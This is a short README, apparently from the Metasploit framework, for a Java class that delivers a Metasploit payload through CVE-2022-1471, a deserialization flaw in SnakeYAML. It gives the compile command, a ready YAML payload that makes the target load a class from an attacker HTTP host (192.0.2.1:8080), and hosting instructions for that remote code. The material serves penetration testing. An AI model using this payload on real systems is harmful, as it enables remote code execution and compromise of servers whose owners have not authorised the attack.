Spencer McIntyre
26 lines
1.3 KiB
Markdown
26 lines
1.3 KiB
Markdown
# Overview
|
|
The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded as part of the
|
|
exploit for CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.
|
|
|
|
See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in for more information.
|
|
|
|
## Compiling
|
|
It's necessary to specify the Metasploit Payloads data directory as the class path when compiling the code. See the
|
|
[metasploit-payloads][1] repository for instructions on how to compile the main Java payloads and install the data
|
|
files.
|
|
|
|
Compile the Java source file using `javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java`.
|
|
|
|
## Usage
|
|
Trigger the deserialization using the following YAML:
|
|
```yaml
|
|
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://192.0.2.1:8080/"]]]]
|
|
```
|
|
|
|
Host the compiled class on an HTTP server along with the file `/META-INF/services/javax.script.ScriptEngineFactory`. The
|
|
contents of this file should simply be the class name to load (`MyScriptEngineFactory`). See Metasploit's
|
|
`Msf::Exploit::Remote::Java::HTTP::ClassLoader` mixin for more information and the remaining components necessary to
|
|
deliver a Metasploit payload.
|
|
|
|
[1]: https://github.com/rapid7/metasploit-payloads/tree/master/java
|